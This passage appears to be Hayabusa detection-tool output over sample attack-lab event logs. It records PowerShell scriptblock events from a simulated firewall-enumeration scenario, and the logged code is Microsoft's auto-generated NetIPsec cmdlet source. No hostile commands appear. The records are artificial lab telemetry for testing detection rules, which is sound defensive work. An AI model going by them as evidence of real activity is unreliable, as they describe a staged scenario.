[Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv6Addresses')) { [object]$__cmdletization_value = ${IPv6Addresses} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv4Addresses')) { [object]$__cmdletization_value = ${IPv4Addresses} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PassThru')) { [object]$__cmdletization_value = ${PassThru} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Output'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('SetPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.786 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"<?xml version='1.0' encoding='utf-8'?> <PowerShellMetadata xmlns=""http://schemas.microsoft.com/cmdlets-over-objects/2009/11""> <Class ClassName=""root/standardcimv2/MSFT_NetMainModeRule"" ClassVersion=""1.0.0""> <Version>1.0.0.0</Version> <DefaultNoun>NetIPsecMainModeRule</DefaultNoun> <InstanceCmdlets> <GetCmdletParameters DefaultCmdletParameterSet=""GetAll""> <QueryableProperties> <Property PropertyName=""InstanceID""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata PSName=""Name"" CmdletParameterSets=""ByName"" IsMandatory=""true"" Position=""0"" Aliases=""ID""/> </RegularQuery> </Property> <Property PropertyName=""DisplayName""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata CmdletParameterSets=""ByDisplayName"" IsMandatory=""true""/> </RegularQuery> </Property> <Property PropertyName=""Description""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""DisplayGroup""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""RuleGroup""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata PSName=""Group"" CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""Enabled""> <Type PSType=""NetSecurity.Enabled""/> <RegularQuery> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""MainModeCryptoSet""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""Phase1AuthSet""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""PrimaryStatus""> <Type PSType=""NetSecurity.PrimaryStatus""/> <RegularQuery> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""Status""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""PolicyStoreSource""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""PolicyStoreSourceType""> <Type PSType=""NetSecurity.PolicyStoreType""/> <RegularQuery> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> </QueryableProperties> <QueryableAssociations> <Association Association=""MSFT_NetMainModeRuleFilterByAddress"" ResultRole=""GroupComponent"" SourceRole=""PartComponent""> <AssociatedInstance> <Type PSType=""Microsoft.Management.Infrastructure.CimInstance"" ETSType=""Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter""/> <CmdletParameterMetadata PSName=""AssociatedNetFirewallAddressFilter"" IsMandatory=""true"" ValueFromPipeline=""true"" CmdletParameterSets=""ByAssociatedNetFirewallAddressFilter""/> </AssociatedInstance> </Association> <Association Association=""MSFT_NetMainModeRuleInProfile"" ResultRole=""PartComponent"" SourceRole=""GroupComponent""> <AssociatedInstance> <Type PSType=""Microsoft.Management.Infrastructure.CimInstance"" ETSType=""Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile""/> <CmdletParameterMetadata PSName=""AssociatedNetFirewallProfile"" IsMandatory=""true"" ValueFromPipeline=""true"" CmdletParameterSets=""ByAssociatedNetFirewallProfile""/> </AssociatedInstance> </Association> <Association Association=""MSFT_NetMainModeRuleMMAuthSet"" ResultRole=""GroupComponent"" SourceRole=""PartComponent""> <AssociatedInstance> <Type PSType=""Microsoft.Management.Infrastructure.CimInstance"" ETSType=""Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet""/> <CmdletParameterMetadata PSName=""AssociatedNetIPsecPhase1AuthSet"" IsMandatory=""true"" ValueFromPipeline=""true"" CmdletParameterSets=""ByAssociatedNetIPsecPhase1AuthSet""/> </AssociatedInstance> </Association> <Association Association=""MSFT_NetMainModeRuleMMCryptoSet"" ResultRole=""GroupComponent"" SourceRole=""PartComponent""> <AssociatedInstance> <Type PSType=""Microsoft.Management.Infrastructure.CimInstance"" ETSType=""Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet""/> <CmdletParameterMetadata PSName=""AssociatedNetIPsecMainModeCryptoSet"" IsMandatory=""true"" ValueFromPipeline=""true"" CmdletParameterSets=""ByAssociatedNetIPsecMainModeCryptoSet""/> </AssociatedInstance> </Association> </QueryableAssociations> <QueryOptions> <Option OptionName=""All""> <Type PSType=""System.Management.Automation.SwitchParameter""/> <CmdletParameterMetadata CmdletParameterSets=""GetAll""/> </Option> <Option OptionName=""PolicyStore""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> <Option OptionName=""GPOSession""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> <Option OptionName=""TracePolicyStore""> <Type PSType=""System.Management.Automation.SwitchParameter""/> <CmdletParameterMetadata/> </Option> </QueryOptions> </GetCmdletParameters> <Cmdlet> <CmdletMetadata Verb=""Set"" ConfirmImpact=""Medium""/> <Method MethodName=""cim:ModifyInstance""> <Parameters> <Parameter ParameterName=""ElementName""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""NewDisplayName""/> </Parameter> <Parameter ParameterName=""Description""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""Description""/> </Parameter> <Parameter ParameterName=""Enabled""> <Type PSType=""NetSecurity.Enabled""/> <CmdletParameterMetadata PSName=""Enabled""/> </Parameter> <Parameter ParameterName=""Profiles""> <Type PSType=""NetSecurity.Profile""/> <CmdletParameterMetadata PSName=""Profile""/> </Parameter> <Parameter ParameterName=""Platforms""> <Type PSType=""string[]""/> <CmdletParameterMetadata PSName=""Platform""/> </Parameter> <Parameter ParameterName=""MainModeCryptoSet""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""MainModeCryptoSet""/> </Parameter> <Parameter ParameterName=""Phase1AuthSet""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""Phase1AuthSet""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:LocalAddress""> <Type PSType=""string[]""/> <CmdletParameterMetadata PSName=""LocalAddress""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:RemoteAddress""> <Type PSType=""string[]""/> <CmdletParameterMetadata PSName=""RemoteAddress""/> </Parameter> </Parameters> </Method> <GetCmdletParameters> <QueryableProperties> <Property PropertyName=""InstanceID""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata Aliases=""ID"" PSName=""Name"" Position=""0"" IsMandatory=""true"" CmdletParameterSets=""ByName""/> </RegularQuery> </Property> <Property PropertyName=""DisplayName""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata PSName=""DisplayName"" IsMandatory=""true"" CmdletParameterSets=""ByDisplayName""/> </RegularQuery> </Property> <Property PropertyName=""DisplayGroup""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata PSName=""DisplayGroup"" IsMandatory=""true"" CmdletParameterSets=""ByDisplayGroup""/> </RegularQuery> </Property> <Property PropertyName=""RuleGroup""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata PSName=""Group"" IsMandatory=""true"" CmdletParameterSets=""ByGroup""/> </RegularQuery> </Property> </QueryableProperties> <QueryOptions> <Option OptionName=""PolicyStore""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> <Option OptionName=""GPOSession""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> </QueryOptions> </GetCmdletParameters> </Cmdlet> <Cmdlet> <CmdletMetadata Verb=""Remove"" ConfirmImpact=""Medium""/> <Method MethodName=""cim:DeleteInstance""/> </Cmdlet> <Cmdlet> <CmdletMetadata Verb=""Rename"" ConfirmImpact=""Medium""/> <Method MethodName=""Rename""> <ReturnValue> <Type PSType=""System.Int32""/> <CmdletOutputMetadata> <ErrorCode/> </CmdletOutputMetadata> </ReturnValue> <Parameters> <Parameter ParameterName=""NewName""> <Type PSType=""string""/> <CmdletParameterMetadata IsMandatory=""true"" PSName=""NewName""/> </Parameter> </Parameters> </Method> </Cmdlet> <Cmdlet> <CmdletMetadata Verb=""Copy"" ConfirmImpact=""Medium""/> <Method MethodName=""CloneObject""> <ReturnValue> <Type PSType=""System.Int32""/> <CmdletOutputMetadata> <ErrorCode/> </CmdletOutputMetadata> </ReturnValue> <Parameters> <Parameter ParameterName=""NewPolicyStore""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""NewPolicyStore""/> </Parameter> <Parameter ParameterName=""NewGPOSession""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""NewGPOSession""/> </Parameter> <Parameter ParameterName=""NewName""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""NewName""/> </Parameter> </Parameters> </Method> </Cmdlet> <Cmdlet> <CmdletMetadata Verb=""Enable"" ConfirmImpact=""Medium""/> <Method MethodName=""Enable""> <ReturnValue> <Type PSType=""System.Int32""/> <CmdletOutputMetadata> <ErrorCode/> </CmdletOutputMetadata> </ReturnValue> </Method> </Cmdlet> <Cmdlet> <CmdletMetadata Verb=""Disable"" ConfirmImpact=""Medium""/> <Method MethodName=""Disable""> <ReturnValue> <Type PSType=""System.Int32""/> <CmdletOutputMetadata> <ErrorCode/> </CmdletOutputMetadata> </ReturnValue> </Method> </Cmdlet> </InstanceCmdlets> <StaticCmdlets> <Cmdlet> <CmdletMetadata Verb=""New"" ConfirmImpact=""Medium""/> <Method MethodName=""cim:CreateInstance""> <Parameters> <Parameter ParameterName=""cim:OperationOption:PolicyStore""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""PolicyStore""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:GPOSession""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""GPOSession""/> </Parameter> <Parameter ParameterName=""InstanceID""> <Type PSType=""string""/> <CmdletParameterMetadata Aliases=""ID"" PSName=""Name""/> </Parameter> <Parameter ParameterName=""ElementName""> <Type PSType=""string""/> <CmdletParameterMetadata IsMandatory=""true"" PSName=""DisplayName""/> </Parameter> <Parameter ParameterName=""Description""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""Description""/> </Parameter> <Parameter ParameterName=""RuleGroup""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""Group""/> </Parameter> <Parameter ParameterName=""Enabled""> <Type PSType=""NetSecurity.Enabled""/> <CmdletParameterMetadata PSName=""Enabled""/> </Parameter> <Parameter ParameterName=""Profiles""> <Type PSType=""NetSecurity.Profile""/> <CmdletParameterMetadata PSName=""Profile""/> </Parameter> <Parameter ParameterName=""Platforms""> <Type PSType=""string[]""/> <CmdletParameterMetadata PSName=""Platform""/> </Parameter> <Parameter ParameterName=""MainModeCryptoSet""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""MainModeCryptoSet""/> </Parameter> <Parameter ParameterName=""Phase1AuthSet""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""Phase1AuthSet""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:LocalAddress""> <Type PSType=""string[]""/> <CmdletParameterMetadata PSName=""LocalAddress""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:RemoteAddress""> <Type PSType=""string[]""/> <CmdletParameterMetadata PSName=""RemoteAddress""/> </Parameter> </Parameters> </Method> </Cmdlet> </StaticCmdlets> </Class> <Enums> <Enum EnumName=""NetSecurity.Enabled"" UnderlyingType=""uint16""> <Value Name=""True"" Value=""1""/> <Value Name=""False"" Value=""2""/> </Enum> <Enum EnumName=""NetSecurity.Profile"" UnderlyingType=""uint16"" BitwiseFlags=""true""> <Value Name=""Any"" Value=""0""/> <Value Name=""Public"" Value=""4""/> <Value Name=""Private"" Value=""2""/> <Value Name=""Domain"" Value=""1""/> <Value Name=""NotApplicable"" Value=""65535""/> </Enum> <Enum EnumName=""NetSecurity.PrimaryStatus"" UnderlyingType=""uint16""> <Value Name=""Unknown"" Value=""0""/> <Value Name=""OK"" Value=""1""/> <Value Name=""Inactive"" Value=""2""/> <Value Name=""Error"" Value=""3""/> </Enum> <Enum EnumName=""NetSecurity.PolicyStoreType"" UnderlyingType=""uint16""> <Value Name=""None"" Value=""0""/> <Value Name=""Local"" Value=""1""/> <Value Name=""GroupPolicy"" Value=""2""/> <Value Name=""Dynamic"" Value=""3""/> <Value Name=""Generated"" Value=""4""/> <Value Name=""Hardcoded"" Value=""5""/> </Enum> </Enums> </PowerShellMetadata>",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetMainModeRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 